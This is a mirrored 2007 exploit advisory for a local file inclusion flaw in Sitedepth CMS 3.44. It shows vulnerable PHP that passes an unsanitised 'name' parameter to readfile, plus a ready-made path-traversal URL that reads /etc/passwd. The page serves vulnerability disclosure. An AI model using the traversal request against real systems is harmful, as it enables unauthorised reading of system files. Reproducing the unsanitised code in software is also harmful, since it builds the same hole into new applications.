Lucene search
K

sitedepth-lfi.txt

🗓️ 26 Jun 2007 00:00:00Reported by H4 / Team XPKType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Sitedepth CMS 3.44 LFI Exploit, 2006-11-07 Bu

Code
`__________________________________________________________________________  
  
[*] Sitedepth CMS 3.44 Local File Include LFI Exploit   
__________________________________________________________________________  
  
[!] Application homepage : http://www.sitedepth.com/  
[!] Author : H4 / Team XPK   
[!] Contact : [email protected]  
[!] Bug discovered : 2006-11-07  
[!] Bug published : 2007-06-25  
  
---------------------------------------------------------------------  
  
Vuln. code: ShowImage.php  
  
  
<?php  
  
include 'sitedepth.php';  
$content_type = 'image/jpeg';  
$filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];  
$filename_show = $_GET['name'];  
header ('Content-type: ' . $content_type);  
header ('Content-Disposition: inline; filename=' . $filename_show);  
readfile ($filename); <-------------- BAD!   
?>  
  
---------------------------------------------------------------------  
  
[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd  
  
---------------------------------------------------------------------  
  
[!] Sometimes it`s time to give instead of taking :)  
  
[!] Greetz to Angeldust & Streets and to rest of community.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation